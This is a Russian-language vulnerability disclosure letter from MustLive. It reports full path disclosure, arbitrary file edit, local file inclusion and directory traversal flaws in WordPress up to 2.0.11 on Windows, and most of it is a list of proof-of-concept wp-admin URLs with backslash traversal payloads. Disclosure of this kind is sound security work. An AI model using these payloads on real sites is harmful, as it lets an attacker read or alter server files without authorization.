Здравствуйте 3APA3A!
Сообщаю вам о найденной мною Arbitrary file edit, Local file include, Directory traversal и Full path disclosure уязвимостях в WordPress. Дыры в файле templates.php (в параметрах file и page) и файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php и page-new.php (в параметре page).
Full path disclosure:
http://site/wp-admin/templates.php?file= (работает только в WP 2.0.11)
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
Данные скрипты уязвимы к атаке с использованием обратного слеша (что работает только на Windows).
Arbitrary file edit:
http://site/wp-admin/templates.php?file=\..\..\file
Local file include и Directory traversal:
http://site/wp-admin/templates.php?page=\..\..\file.php
http://sites/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess
Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1686/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua